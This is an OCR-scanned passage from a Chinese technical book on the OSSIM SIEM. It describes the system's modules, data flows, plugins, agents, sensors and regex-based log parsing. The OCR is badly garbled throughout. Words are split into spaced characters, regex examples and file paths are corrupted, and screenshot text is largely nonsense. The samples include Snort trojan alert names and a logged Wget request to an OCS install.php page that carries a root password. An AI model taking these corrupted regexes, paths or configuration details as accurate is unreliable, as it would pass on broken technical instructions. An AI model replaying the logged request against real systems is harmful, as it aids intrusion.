第 2 层 ， 属 于 核心 处 理 层 ， 主 要 实现 对 各 种 数据 的 深入 加 工 处 理 ， 包 括 运行 监控 、 安 全 分 
析 、 策 略 管理 、 风 险 评 估 、 关 联 分 析 、 安 全 对 象 管理 、 脆 弱 性 管理 、 事 件 管理 、 报 表 管理 等 。 
该 层 中 OSSIM Server 是 主角 ，OSSIM 服务 器 主要 功能 是 安全 事件 的 集中 ， 并 对 集中 后 的 事件 
进行 关联 分 析 、 风险 评 估 及 严重 性 标注 等 。 所 谓 的 集中 就 是 以 一 种 统一 格式 组 织 所 有 系统 产生 
的 安全 事件 告警 信息 〈Alarms)， 并 将 所 有 的 网 络 安全 事件 告警 存储 到 数据 库 ， 这 样 就 完成 了 
对 网 络 中 所 产生 事件 的 一 个 庞大 视图 .系统 通过 事件 序列 关联 和 启发 式 算法 关联 来 更 好 地 识别 
误 报 和 侦查 攻击 的 能 力 。 
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OSSIM 本 质 上 通过 对 各 种 探测 器 和 监控 产生 的 告警 进行 格式 化 处 理 ， 再 进行 关联 分 析 ， 
通过 后 期 处 理 ， 能 提高 检测 性 能 ， 即 减少 告警 数量 ， 减 小 关联 引擎 的 压力 ， 从 整体 上 提高 告 
质量 。 

第 3 层 ， 属 于 数据 展现 层 ， 主 要 负责 完成 与 用 户 之 间 的 交互 ， 达 到 安全 预警 和 事件 监控 、 
安全 运行 监控 、 综 合 分 析 的 统一 展示 , 形式 上 以 图 形 化 方式 展示 给 用 户 。Web 框架 (Framework) 
控制 台 界 面 即 OSSIM 的 Web UI ( Web User Interface, Web 用 户 界 面 )， 其 实 就 是 OSSIM 系统 
对 外 的 门户 站 点 ， 它 主要 由 仪表 盘 、SIEM 控制 台 、Alarm 控制 台 、 资 产 漏洞 扫描 管理 、 可 靠 
性 监控 、 报 表 及 系统 策略 等 部 分 组 成 。 


1.2.1. 主要 模块 的 关系 

从 使 用 的 开发 工具 上 看 ，OSSIM 系统 主要 采用 了 PHP, Python, Perl, Erlang, Ruby, Ajax 
和 c 这 几 种 编程 语言 ， 从 软件 层面 上 看 OSSIM 框架 系统 包括 五 大 模块 : Agent 模块 、Server 
模块 、Database 数据 库 模 块 、Frameworkd 模块 以 及 Framework 模块 ， 轴 辑 结构 如 图 1-5 所 示 。 


图 1-5. OSSIM 系统 逻辑 结构 
OSSIM 五 个 模块 之 间 的 数据 流向 如 图 1-6 所 示 : 
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^ Framework 


i Plugin | i Plugin | 
图 1-6 五 大 模块 的 数据 流向 


(1) Agent ££ Server: 来 自 各 个 传感器 的 安全 事件 被 对 应 Agent 格式 化 后 ， 以 加 密 字符 串 
传 给 Server。 

(2) Server 至 Agent: 发 送 有 关 请 求 命令 (request command)， 以 字符 串 方式 向 Agent f£ 
送 ， 主 要 是 要 求 Agent 完成 插件 的 启动 停止 及 获取 信息 等 。 

(3) Server 至 Frameworkd: 发 送 请 求 命令 , 要 求 Frameworkd 针对 Alarm 采取 相应 操作 ， 
例如 执行 外 部 程序 或 发 出 Email 来 通知 管理 员 。 

(4) Framework 至 Server: 发 送 请 求 命令 至 Server。 要 求 Server 通知 Agent 对 插件 CPlugins) 
进行 启动 、 停 止 等 操作 。 

(5) Framework 至 Frameworkd: 发 送 请 求 命令 ， 要 求 Frameworkd 启动 OpenVAS 扫 
描 进程 。 

(6) Frameworkd 至 Framework: 传送 OpenVas 扫描 结果 在 前 端 页 面 中 显示 。 

(7) Database 至 Agent 和 Server: 向 Agent 和 Server 提供 数据 。 

(8) Server 至 Database: Server 需要 将 Events、Alarms 等 数据 存 入 数据 库 并 索引 或 更 新 
操作 。 

(9) Database 至 Frameworkd: 在 Frameworkd 中 的 Openvas 扫描 和 动作 需要 用 调用 数据 
库 里 的 数据 。 

(10) Frameworkd 至 Database: 在 Frameworkd 执行 过 程 中 将 Openvas 扫描 结果 存 入 
数据 库 。 

(11) Database 至 Framework: PHP 页 面 显示 需要 调用 数据 库 的 告警 事件 。 

(12) Framework 至 Database: 用 户 参 数 设置 信息 需要 存 入 数据 库 。 


1.2.2 ”安全 插件 (Plugins) 


OSSIM 4 系统 中 插件 很 多 ， 可 将 它们 分 为 采集 (Collection) 插件 和 监视 (Monitor) 插件 。 
每 个 插件 又 细 分 为 ID 和 SID 。 采 集 插 件 主要 通过 SNMP, Syslog, WMI 等 协议 进行 采集 ， 在 
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Sensor 中 常见 采集 插件 有 ossec-single-line、ssh、syslog、wmi-system-logger 等 ， 其 中 SNMP 
与 WMI 协议 需要 Agent 采集 数据 时 主动 进行 所 采集 数据 的 抓 取 ; Syslog 协议 则 被 动 接收 采集 
数据 。 具 体 如 图 1-7 所 示 。 


Total number of plugins: 183 


Plugins enabled Plugins available 
6 items selected | 

ossec-single-line — | w2003DNS + A 

pam_unix = | airlock * 

prads 一 | aix-audit + 

ssh -- aladdin * 

sudo —i allot * 

suricata = | alteonos + 
amun-honeypot + 
apache * Vi 


图 1-7 查看 插件 
监控 插件 包括 malwaredomainlist、nessus、nmap、ntop、ocs、ossim 等 ， 如 图 1-8 所 示 。 


四 TT 


Ls 设置 监控 插件 


当 这 些 插件 加 载 完 毕 之 后 ， 我 们 可 以 到 Web UI 中 Configuration — Deployment — 
Components 一 Sensors 栏目 下 的 “而 Sensor Status” 查 看 所 添加 的 监控 插件 的 工作 状态 ， 如 图 
1-9 所 示 。 注 意 : 在 OSSIM 5.x 版 本 中 移 除了 iphone, forensics-db-1、malwaredomainlist-monitor、 
motion, nessus-monitor ntop-monitor、snortunified 插件 ，OSSIM 4.X 中 p0f、PADS、ARPwatch 
也 被 PRADS 所 取代 ，suricata 也 被 Alienvault NIDS 取代 ，ossec_sigle line 被 Alienvault_HIDS 
取代 。 
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COMPONENTS SCHEDULER SMARTEVENTCOLLECTION LOCATIONS 


ET 19z168.11.105TVirtualusMAllinone] illa [ UP or ENABLED: 9 / DOWN or DISABLED: 0 / Totais: 9 ] 


mui PROCESSSTATUS = ACTION  PLUGINSTATUS ACTION LATEST SECURITY EVENT 

E sudo Unknown 3 ENwstEp Dite suda Command executed IUSERNAMEI 

* ^ nmapmontor Unknown ENABLED Disatie 

- snor up Stop EnwetEo Diate snore "ETPRO TROJAN Trojan /Wir32Zbot Covert Channel 2 port 53 
pece DATE LAST SECURITY EVENT 


ÉJ 1921681L105 |VirualUSMAlInOrel 2015-04-16 08:12:15 (143 Jort: "ETPRO TROJAN Trojar/Win32 bot Covert Channel 2 port 53" 
1e i 
E] 192.168.114.105 [VirtualUSMAIIInOne] snort -ET POLICY PE EXE or DLL Windows file download" 
q p jh 
HJ 19215811105 [VirualUSMAlnOrel 2015-04-16 08:0947 (236 seconds spo) snort: "ET CURRENT. EVENTS Tor2Web onion Proxy Service SSL Cert (1)" 
ET 192.168.11.105 WirualusMAmnonel 2015-04-16 08:0947 (-14236 secondsago) snort: "ETPRO TROJAN Trojan/Win322bot Covert Channel port 53" 
E 192.168.11.105 WirualusMAlnora 2015-04-16 08:0947 (-14236 sezonds ago) snort: "ETPRO TROJAN Chanitor Variant onion Prony Domain" 
* pmu ur Stop ENABLED Disate  pam,unbx: asthentkation failure 
0 mopmontor ur step ENABLED Disatie 


图 1-9 查看 Sensor 监控 插件 工作 状态 


UNIX/Linux 环境 下 ， 大 部 分 系统 都 安装 有 SNMP 与 Syslog。 如 果 采 集 数 据 的 目标 系统 为 
Windows， 那 么 考虑 使 用 WMI 协议 ， 此 时 只 需要 在 Windows 上 进行 相关 配置 ， 以 便 能 够 远程 
访问 ， 无 须 安装 额外 的 工具 软件 。 


12.3 ”采集 与 监控 插件 的 区 别 

OSSIM 系统 的 Sensor 端 包含 了 采集 (Collection》 和 监控 (Monitor)， 这 两 类 插件 统称 为 
安全 插件 ， 它 们 都 安装 在 Sensor 上 。 虽 然 它 们 都 称 为 插件 可 工作 原理 却 不 同 ， 检 测 插件 
(Detector) 是 检测 器 信息 产生 后 ， 由 代理 自动 向 服务 器 发 送 ， 包 括 Snort, Apache 等 。 而 检 
测 器 插件 需要 主动 采集 安全 设备 接口 上 的 信息 , 这 类 插件 可 分 为 Snort、 POf、 Prads、Arpwatch、 
Apache、Ssh、Sudo 等 。 

监控 (Monitor) 插件 ， 必 须 由 服务 器 主动 发 起 查询 请 求 。 监 控 插 件 中 定义 了 需要 主动 采 
集 的 安全 设备 接口 ， 该 模块 接收 控制 中 心 发 出 的 命令 和 查询 ， 在 OSSIM 系统 中 典型 Monitor 
插件 有 Nmap、Nessus 等 。 读 者 可 在 Alienvault 控制 台 的 Sensor 配置 中 (Configure Monitor 
Plugins) 查看 。OSSIM 主要 安全 插件 如 表 1-2 所 示 。 


31-2 OSSIM 4 主要 插件 分 布 情况 


插件 名 称 


1 访问 控制 csico-acs、cisco-acs-idm、cisco-asa、f5-firepass 


| 2 防 病毒 Avast, gfi security, mcafee, clamav, sophos, panda, netkeeper, 
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( 续 表 ) 
分 类 功能 插件 名 称 
cisco-pix, ipfw, mOnOwall, netscreen-igs, motorola-firewall, iptables, fortigate、 
3 防火 墙 stonegate, isa-server sonicwall, mOnOwall, pf, cyberguard, lucent-brick、 paloalto、 
juniper-srx,. sidewinder 
4 HIDS Ossec, ossec-single-line 
5 IDS Dragon. juniper-idp. tippingpoint, kismet, osiris 
6 Glastopng, honeyd 
7 负载 均衡 Allot, cisco-ace, citrix-netscaler, f5, heartbeat 
8 Cisco, cisco-nexus-nx-os, netgear, nortel, extreme, raslogd, alteonos 
9 ntop-monitor, pOf, prads, session-monitor, tcptrack-monitor 
10 vmware-esxi, vmware-vcenter, vmware-vcenter-sql 


1 漏洞 扫描 Nessus、Nessus-detector、Nessus-monitor 
12 网 络 服务 Apache, fip, dhcp, samba, squid, ssh 


13 无 线 接 入 aruba-6, extreme-wireless, cisco-wlc, proxim-orinoco 


对 OSSIM 插件 位 置 的 说 明 : 在 安装 时 系统 将 支持 的 插件 ， 全 部 复制 到 目录 
/etc/ossim/agent/plugins/ 中 ， 如 Nagios 插件 的 扩展 名 为 “.cfg” 的 文本 文件 ， 可 以 用 任何 编辑 器 
修改 ， 在 每 个 插件 配置 文件 中 最 难 理解 的 当 属 正则 表达 式 (RegExp)。OSSIM 4 下 主要 插件 如 
图 1-10 所 示 ， 除 此 以 外 还 包括 实现 优先 级 队列 的 RabbitMQ 插件 和 实现 自动 化 部 署 的 Ansible 
插件 。 


图 1-10 规则 与 插件 路 径 


在 今后 安装 过 程 中 , 选择 多 少 插件 系统 就 在 开机 时 加 载 多 少 (插件 加 载 越 多 越 占 用 内 存 )。 
具体 查看 插件 详情 ， 可 以 访问 /etc/ossim/agent/config.cfg 配置 文件 ， 而 且 在 系统 
/etc/ossim/ossim_setup.conf 的 [sensor] 项 中 也 详细 列 出 了 监控 插件 Cmonitors) 和 检测 插件 

(detector) 分 别 包 含 了 哪些 内 容 。 在 插件 这 方面 ，OSSIM 默认 提供 了 上 百 个 插件 ， 涉 及 8 个 
大 类 ， 在 表 1-2 中 仅 列 出 了 一 小 部 分 ， 从 插件 分 布 和 数量 来 看 ，OSSIM 系统 几乎 包含 了 常用 
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的 插件 类 型 。 例 如 运 维 设备 Cisco, CheckPoint, F5、Fortigate、Netscreen、Sonicwall、 Symantec 
等 ， 如 果 遇 到 无 法 识别 设备 的 插件 ， 只 能 自己 编写 插件 ， 后 续 内 容 会 详细 讲 到 。 已 加 载 插件 如 


图 1-11， 图 1-12 所 示 。 


一 般 性 配置 


包括 主机 名 、 管 理 IP、NTP 朋 


图 System Status ki 
MAIN INFORMATION 
Hostname VirtualUSMAllInOne [192.168.11.150] 
Time on system. Sat Oct 3 21:58:55 2015 
0 days, V1 hours, 54 minutes 


8.17 (1 min) 9.48 (5 mins) 9.41 (15 mins) 


System uptime. 


Load Average. 


RARE 传感器 配置 
E DNS, Firewall, “一 包括 OUTPUT、 
— Gateway DETECTION. 


— COLLECTION 


软件 升级 Software Updates 


SYSTEM INFORMATION 
RAM used [635.87 Mit, 23.23 CB, 23.85 GBI 


Swap used [15:27 GB. 16.00 KB, 15.27 CB) 


Disk usage RARA 


Running processes 209 CPU used [Intel CorerTND IZ 2600K CPU 2 3.40CHe - & core/s] 
Current sessions 3 LP P P P SJ | 
Network 
GENERAL INFORMATION 
Frewall sf VPN infmsrucure X internet Connection | X ZEE XLEERO E Default Gateway 192.168.11.1 DNS Servers 192.168.11.1 
INTERFACE INFORMATION 
Mh sex 2058 G8 r 127.0.0.1 Role 
b PA an 20.58 G8 Netmask 255.0.0.0 Network 127.0.0.0 
Wh Rx 接收 流量 23.85 C8 » 192.168.11.150 Role Manigemere 
be MU (ere 发 送 流量 11.90 C8 Netmask 255.255.255.0 Network 192.168.11.0 
加 Alienvault Status 
SENSOR 
Plugins enabled no ÉNIPRERUSESE Sniffing interfaces RIEF E E: emo 
Netflow Y — BHiNeffiowHi i Network monitored. 监控 网 和 192.168.0.0/16, 172.16.0.0/12, 10.0.0.018 
DATABASE PELES 
Alienvault 165 C8 Alienvault SIEM 15.96 GB 
inventory 1.07 NE 
SERVER. 
Total Directives Categorles ”事件 分 尖 数 量 1000 ] 
IP Reputation E EPSS (8t Viw TRENE 
图 
1-11 查看 传感器 启用 的 插件 情况 
SENSOR CONFIGURATION 
OUTPUT DETECTION COLLECTION 
Total number of plugins: 189 
Plugins enabled Plugins available 
11 items selected 


AlienVault_HIDS 
AlienVault_NIDS 
cisco-router 
damav 
pam_unix 

prads 

squid 


SquidGuard 


— | Alienvautt HIDS-IDM 
= | wao03DNs 

= | airlock 

= | acauak 

— | aladdin 

-= | aiot 

= | alteonos 


= | amun-honeypot 


1-12 查看 加 载 插件 详情 


o c 
General Configuration | Network Configuration | Sensor Configuration | Log 


从 图 中 看 出 ， 此 Sensor 系统 中 启用 了 11 个 插件 ， 如 何在 Web 上 展示 出 来 呢 ? 如 图 1-12 
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所 示 总 共 184 个 插件 在 Plugins enabled 中 启用 了 11 个 插件 。 
从 图 1-13 看 出 这 里 显示 11 个 插件 ， 我 们 可 打开 /etc/ossim/ossim_setup.conf 文件 查看 。 


45 [sensor] 
46 detecto 0-router, pam unix id, ssh, squidGuard, prads, clamau, sys| 
ingle-line, 
flou control- 
-etho 


50 nonitors-nnap-nonitor,ntop-nonitor, n-nonitor 


图 1-13. 从 OSSM 配置 文件 中 查看 插件 


1.2.44 ”检测 器 (Detector) 
OSSIM 下 的 检测 器 起 到 收集 资源 信息 及 监听 当前 网 段 数据 包 的 作用 ， 主 要 包括 ntop、 
prads、suricata、ossec 等 ， 相 关内 容 在 后 续 章 节 里 会 详细 介绍 。 


1.25 RE (Agent) 

代理 进程 (由 于 Agent 采用 ain 语言 编写 , 所 以 无 须 编译 就 能 在 Python Shell 环境 运行 ) 
将 运行 在 多 个 主机 上 ， 负 责 从 安全 设备 采集 相关 信息 比如 报警 日 志 等 )， 并 将 采集 到 的 各 类 
信息 统一 格式 ， 最 后 将 这 些 数 据 传 至 Server。 

从 采集 方式 上 看 ，Agent 属于 主动 采集 ， 可 以 形象 理解 为 由 OSSIM Server 安插 在 各 个 监 
控 网 段 的 “耳目 ” 由 它们 收集 数据 ， 并 主动 推送 到 Collector 中 ,然后 Collector 又 连接 
队列 系统 、 缓 存 系统 及 存储 系统 。 

OSSIM 中 的 这 些 代理 脚本 位 于 /usr/share/alienvault/ossim-agent/ 目 录 下 ， 脚 本 经 过 加 密 ， 
以 .pyo 为 扩展 名 。 例 如 OSSIM 代理 (ossim-agent) 直接 读 取 存储 在 /var/log/suricata/unified2. 
alert.1428975051 的 日 志 。 

Suricata 的 报警 输出 文件 是 /var/log/suricata/unified2.alert， 这 是 由 /etc/suricata/suricata.yaml 
配置 文件 在 111 行 # alert output for use with Barnyard2 定义 , 所 以 ossim-agent 直接 读 取 该 文件 
就 能 显示 在 SIEM 控制 台中 。 

Agent 的 主要 功能 是 接收 或 抓 取 Plugins 发 送 过 来 或 者 生成 的 日 志 ， 经 过 归 一 化 处 理 ， 然 
后 有 序 地 传送 到 OSSIM 的 Server. 它 的 功能 很 复杂 ,因为 它 的 设计 要 考虑 到 如 果 Agent 和 Server 
之 间 的 网 络 中 断 、 拥 堵 、 丢 包 等 情况 。 

在 免费 版 的 OSSIM 系统 中 ， 其 日 志 处 理 大 部 分 情况 下 不 能 达到 实时 ， 但 可 以 达到 准 实时 
(Firm Real-Time )， 通 常会 在 Agent 端 缓存 一 段 时 间 才 会 发 送 到 Server 端 去 。Agent 会 主动 连 
接 两 个 端口 与 外 界 通信 ， 一 个 是 连接 Server 的 40001 端口 (在 /etc/ossim/agent/config.cfg 配置 
文件 的 选项 [output-server] 中 ， 能 看 出 通信 端口 设置 为 40001)， 而 另 一 个 是 连接 数据 库 的 3306 
端口 。 如 图 1-14 所 示 。 
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a 
p" 
ci Sears 


TCP Port 3306 


图 1-14 日 志 归 一 化 处 理 、 收 集 与 存储 
原始 日 志 被 分 成 若干 段 填充 到 相应 的 域 中 ， 这 些 字段 如 下 : 


€ date. sensor. interface. plugin id. plugin sid. priority. protocol. src ip. src port. 
dst ip. dst port 
€ username, password. filename. userdatal. userdata2. userdata3. userdata4. userdata5. 
userdata6. userdata7. userdata8. userdata9 
其 实 Sensor 的 输出 数据 就 是 OSSIM Server 的 输入 “原料 ”我 们 可 在 Web UI 中 查看 Sensor 
的 output 情况 。 如 图 1-15 所 示 。 


SENSOR CONFIGURATION 
OUTPUT DETECTION COLLECTION 


IP: — 192.168.11.105 (master Type: Server, Inventory Priory 0 


图 1-15 Sensor 将 信息 输出 到 OSSIM server 192.168.11.105 中 


1.2.6 ”报警 格式 的 解码 
报警 信息 的 接收 过 程 中 ， 为 了 应 对 报警 信息 格式 的 变化 ，OSSIM 采用 基于 正则 表达 式 的 
方法 对 报警 信息 进行 匹配 , 解析 报警 事件 获取 关键 信息 。 正 则 表达 式 是 一 串 记录 文本 规则 的 代 
码 组 合 , 它 的 作用 可 用 来 进行 文本 匹配 ,例如 对 空白 字符 、 数 字 字 符 、 中 英文 字符 、IP 和 E-mail 
地 址 等 匹配 ， 简 单 地 说 它 就 是 一 个 普通 的 字符 查找 串 。 
例如 ， 下 面 对 一 段 Snort 报警 信息 进行 正则 表达 式 的 匹配 。 
5/26-01:02:17.670721 [**] [1:1419:9] SNMP trap udp [**] [Classification: 
Attempted 
Information Leak] [Priority: 2] {UDP} 20.20.13.17:162 -> 20.20.20.78:162 
<ids> 
«name»snort«/name» 
«method»net socket«/method» 
<regex>^ (\d+/\d+-\d+:\d+:\d+) .\d+\s+[**] [Nd: (Nd) :\d+] 
\.+[Classification: (\.+)] 
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[Priority: (Nd)] ((N.)) 

(Nd . Nd. Nd- \d+) \p* (Nd*) -> (Nd. Nd . Nd . Nd) Vp* (Nd*) «/regex» 
Xorder»time,id,classtype,priority,protocol,srcip,srcport,dstip,dstport«/order» 
«mapping»snort classtype,snort id«/mapping» 

«/ids» 
这 样 通过 正则 表达 式 可 以 提取 时 间 、id、 分 类 、 报 警 级 别 、 协 议 、 源 卫 、 源 端口 、 目 的 IP 

和 目的 端口 等 信息 。 接 着 再 将 这 些 字段 逐个 存储 到 标准 化 的 表 中 ， 分 析 得 到 结果 ， 最 后 通过 

Web 界面 展现 。 


1.2.7 OSSIM Agent 

Agent 运行 在 Sensor 中 ， 负 责 从 各 安全 设备 、 安 全 工具 的 插件 中 采集 相关 信息 〈 比 如 TIS 
服务 日 志 、Snort 报警 日 志 等 )， 并 将 采集 到 的 各 类 信息 统一 格式 ， 再 将 这 些 数据 传 至 Server， 
例如 将 Snort 系统 产生 的 报警 信息 收集 并 存储 在 OSSIM Server 中 。 

OSSIM Agent 中 所 有 脚本 采用 Python 编写 ， 相 关 目 录 在 /etc/ossimy/agent/ 中 ， 代 理 插件 目录 在 
/etc/ossim/agent/plugins/ 中 ， 配 置 文 件 路 径 为 /etc/ossim/agent/config.cfg，OSSIM 系统 的 代理 信息 可 
以 通过 Analysis 一 Detection 下 的 HIDS 标签 中 Agents 查看 。Agent 的 结构 如 图 1-16 所 示 。 


— 
Cr 


ect Detector 
Plugin 


图 1-16 Agent 结构 


40002/tcp: 监听 服务 器 的 原始 请 求 。 

Listener: 接收 服务 器 连接 请 求 。 

Active: 接收 服务 器 输入 并 且 根 据 请 求 扫 描 主 机 。 

Engine: 管理 线程 ， 处 理 监视 器 请 求 。 

Detector Plugin: 读 取 日 志和 进行 归 一 化 处 理 。 

Monitor Plugin: 请 求 监视 器 数据 。 

DB-Connect: 连接 到 本 地 /远程 OSSIM 数据 库 。 

Watchdog: 监视 进程 启动 /停止 进程 ， 检 查 各 插件 是 否 已 经 开始 运行 ， 如 遇 意 外 ， 它 
会 发 现 并 重启 相关 进程 ， 它 自动 检查 时 间 为 180 秒 ， 重 启 进程 时 间 为 3600 秒 ， 其 值 
可 以 在 /etc/ossim/agent/config.cfg 配置 文件 中 修改 。 


1 OSSM 中 定义 的 大 部 分 插件 的 日 志 都 默认 存放 在 /varlog/syslog 中 ， 所 以 自 定义 插件 式 往 | 
N 往 需要 修改 日 志 的 存放 位 置 ， 在 本 书后 面 的 例子 中 将 详细 讲解 。 
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EIE: 


表 1-3 分 析 了 目录 /etc/ossim/agent/plugin/ 中 主要 插件 的 日 志 输出 情况 ， 通 过 该 表 我 们 很 容 
易 了 解 正则 表达 式 的 匹配 情况 。/etc/ossim/agent/plugings/ 目 录 下 有 197 个 插件 ， 如 何 能 了 解 每 
个 插件 的 日 志 的 匹配 情况 呢 ? 例如，SSH 插件 对 应 的 文件 为 ssh.cfg， 记 录 的 日 志文 件 为 


/varlog/auth.log， 匹 配 的 详情 我 们 通过 以 下 命令 实现 CE OSSM 4.4 之 后 的 版 本 中 已 去 除了 
regexp.py 调试 脚本 ， 大 家 可 以 到 作者 博客 下 载 该 脚本 http://bjlcg.com:8080/tools/regexp.py， 以 
便 完 成 后 续 试验 )。 
表 1-3 插件 的 日 志 路 径 
OSSIM Agent 插件 日 志 位 置 


Juniper-vpn 


ID 

| /var/log/apache2/access.log 
/var/log/apache2/error.log 

|isi | /var/log/ossim/arpwatch-eth0.log 
[iss O O /var/log/avast.log 
Dui | /var/log/bind.log 
/var/log/bluecoat.log 
/var/log/cisco-asa.log 
/var/log/cisco-pix.log 
/var/log/syslog 
/var/log/syslog 
/var/log/syslog 
/var/log/extreme-switch.log 
/var/log/syslog 
/var/log/fortigate.log 
/var/log/ossim/fwl.log 
/var/log/syslog 
/var/log/ha-log 
/var/log/iisweb.log 
/var/log/messages. 


/var/log/syslog 


/var/log/juniper-vpn.log 


kismet 


linuxdhep 


/var/log/syslog 


/var/log/ossim/dhcp.log 


MoOnOwall 


/var/log/syslog 


mcafee 


/var/log/mcafee.log 


monit 


/var/log/ossim/monit.log 


nagios 


/var/log/nagios3/Nagios.log 


nessus 


/var/ossec/logs/archive/archive.log 


Nessus-detector 


netgear 


/var/log/ossim/nessus jobs 


/var/log/syslog 


Netscreen-firewall 


/var/log/netscreen.log 
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( 续 表 ) 


OSSIM Agent 插件 日 志 位 置 
nfs /var/log/syslog 


Nortel-switch /var/log/syslog 


openldap. /var/log/openldap/slapd.log 


osiris /var/log/syslog 
Ossec-idm 
Ossec-single-line 


/var/ossec/logs/alerts/alerts.log 


OSSIM-agent /var/log/ossim/agent.log 
POf /var/log/ossim/pOf.log 


Alienvault-dummy-server /var/log/ossim/sem.log 


prads /var/log/prads-asset.log 


J /var/log/ossim/prads-ethO.log 
/varllog/mail log 

— /varllog/snare log 

| snort sysog [ior | /arogsnor/alert 

| snortunifea fior | arlogisnor 
| /var/log/ossim/sophos.log 
[ua | /var/log/squid/access.log 


[so lm | 
[Suiahtp so0 | anogsuricaanhtplon 
psrcua | |nanogsuriam 
[varllog/syslog 
fvarllog/vmware-esxilog 
Jvarllog/vsfipd.log 

| webmin [150 | /varlogiauthlog 


websense 19004 /var/log/websense.log 


下 面 看 个 Apache 访问 日 志 的 例子 ， 如 图 1-17 所 示 。 首 先 在 /varlog/apache2/access.log 中 
的 两 条 日 志 如 下 


25.0.0.1 - — [28/Apr/2014:00:54:3 00] "GET /ossim/ocsreports/install .php?name=rooté&pas 
127.0.0.1 HTTP/1.0 EXPL .11.4" 


E [28/6pr/2014:00:54:34 -04001 /ossin/ocsreports/install.php?nane-root&pass-KuSNLou 
ZsL&host-127.0.0.1 HTTP/1.0" 200 2925 "-" "Uget/1.11.4" 


1-17 Apache 日 志 实 例 


插件 检测 格式 : 


./regexp.py log filename  regexp modifier 
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€ q 只 显示 摘要 。 
如 同 在 Linux 中 定义 别名 一 样 在 regexp.py 脚本 中 也 定义 了 别名 , 区 别 在 于 它 采 用 aliases 
定义 ， 详 情 如 图 1-18 所 示 。 


Nitl,3N.Natl,3N.NM1 
fff:Nafl1,3N.Y 


zfi-20-91)* .) ( [a-zi 


图 1-18 定义 别名 


为 了 方便 插件 内 容 的 定义 ,插件 中 使 用 了 经 常用 到 的 内 容 来 定义 别名 ， 这样 做 的 好 处 是 今 
后 在 定义 某 一 插件 内 容 时 ， 可 使 用 已 定义 的 别名 代替 那个 元 素 ， 比 如 用 IPV4 代替 
\d{1,3f\d{1,3PWd{1,3}\d{1,3} 的 定义 。 由 此 可 知 ， 插 件 中 定义 的 Apache 访问 日 志 的 正则 表达 
式 为 : 

regexp=(\IPV4) (\S+) (\S+) 

\[(?P<date>(\d\d) \/ (\w\w\w) V/ (\d\d\d\d) : (\d\d) : (\d\d) : (\d\d) ) .+"(?P<info>.+)" 
(?P<sid>\d+) (\S+) 
通过 插件 匹配 的 详细 结果 如 图 1-19 所 示 : 


I are/ossin/scripts/regexp .py /var/10og/apache2/acce 
e.cfg u Inore 


g /etc/ n/agent/plugins/apache .cfg 


GET /os install.php? 
9 "-" “Wget/1.11.4 


> "28/Apr/2014:00:54 
9.1 HTTP/1.0', si 


图 1-19 Apache 匹配 结果 
由 此 可 见 ， 经 过 处 理 后 的 日 志 内 容 并 没有 改变 ， 为 了 适应 SIEM 事件 显示 需要 ， 实 际 日 志 
中 各 项 的 排列 顺序 发 生 了 改变 ， 目 的 是 方便 阅读 ， 方 便 更 好 地 展示 在 SIEM 控制 台 上 。 再 接着 
看 SSH 的 日 志 ， 如 图 1-20 所 示 。 


#/usr/share/ossim/scripts/regexp.py /etc/ossim/agent/plugins/ssh.cfg 
/var/log/auth.log q 


图 1-20 SSH 匹配 结果 
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又 比如 : 


#/usr/share/ossim/scripts/regexp.py /var/log/snare2.log 
/etc/ossim/agent/plugins/landesk.cfg q 
Multiple regexp mode used, parsing /etc/ossim/agent/plugins/landesk.cfg 


Rule: | Landesk-sync-job-successed 
Matched 273 times 
Counted 274 lines. 
Matched 273 lines. 


如 果 想 了 解 OSSIM 的 Agent Plugins 所 有 插件 列表 ， 请 访问 以 下 网 址 : 


https://forge.fi-ware.eu/scm/viewvc.php/trunk/FI-WARE/Security/Security 
Monitoring/ServiceLevelSIEM/config/agent/plugins/?diff format-s&sortdir-down&p 
athrev-46&1ogsort-rev&limit changes-0&root-fiware 


1.2.8 代理 与 插件 的 区 别 

初学 者 常 混淆 代理 和 插件 的 概念 ，Sensor (传感器 ) 指 软件 和 硬件 的 传感器 被 安装 在 网 络 
中 收集 和 发 送 数据 ， 而 代理 是 运行 在 传感器 上 , 用 来 收集 和 发 送 数据 到 服务 器 的 一 段 脚本 ， 
个 插件 需要 了 解 特定 系统 的 日 志 格式 〈 例 如 防火 墙 、IDS)， 并 通过 插件 来 采集 数据 。 

系统 中 如 果 启 用 插件 越 多 ， 那 么 采集 到 网 络 中 各 种 数据 就 越 全 面 。 在 Sensor 中 加 载 过 多 
的 插件 ， 将 会 占用 OSSIM Server 的 数据 库 空 间 ， 下 面 的 这 条 经 验 值 需要 读者 了 解 ， 系 统 中 每 
条 事件 ， 约 占用 IKB 存储 空间 ， 而 Imillions 的 事件 量 ， 大 约 占 1.5GB 空间 。 


1.2.9 ”传感器 (Sensor) 

传感器 (Sensor) 俗称 探 针 ， 用 来 收集 监控 网 段 内 各 类 资产 的 信息 ， 它 工作 在 网 卡 的 嗅 探 
模式 。OSSIM 系统 中 ， 把 Agent 和 插件 构成 的 一 个 具有 网 络 行为 监控 功能 的 组 合 称 为 一 个 传 
感 器 ，Sensor 的 功能 范围 主要 有 : 

€ 入 侵 检 测 (最 新 版 已 换 成 支持 多 线程 的 Suricata ) . 

€ 漏洞 扫描 (OpenVAS、Nmap ) 。 

€ 异常 检测 (POf, Prads, ARPWatch 等 ) 。 


Arpwatch 主要 监视 网 络 中 新 出 现 的 MAC 地 址 它 包 含 1 个 监视 库 名 为 arp.dat 在 OSSIM 
中 位 于 /var/lib/arpwatch/arp.dat， 所 以 它 同 样 是 AIDE 监控 的 对 象 。 


| OSSM 具有 强大 的 网 络 威胁 监控 ， 流 量 监测 的 功能 ， 但 无 法 将 威胁 阻 断 ， 所 以 不 能 将 其 
l (0 BNCEWOOBSUE, JC RECETTE YHEHHEON, -ARREA IER OH. 


1E OSSIM 系统 中 传感器 的 状态 可 在 Configuration- Deployment Components Sensors 中 
查看 详情 ， 如 图 1-21 所 示 。 每 个 传感器 中 加 载 的 插件 详情 如 图 1-22 所 示 。 
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DEPLOYMENT 
COMPONENTS SCHEDULER LOCATIONS 
ALIENVAULTCENTER | SENSORS SERVERS 
HON [io [v] ENTRE NEW MOOY ORETESRECTED e» TotiSensor 2 <> Active Sensors 2 asesoria 
P nME FRORTY FORT VERSION STATUS DESCHIFDON 
12am aleman < awm amo 过 
qr semi s aw 410 v 


1-21 多 传感器 状态 


DEPLOYMENT 
COMPONENTS. SCHEDULER SMART EVENT COLLECTION OCATION 
n 
ZO cooo- | | jj, {UP or ENABLED: 6 / DOWN or DISABLED: 0 / Totals: 6 ] 
PLUGIN PROCESS STATUS ACTION PLUGIN STATUS ACTION LATEST SECURITY EVENT 
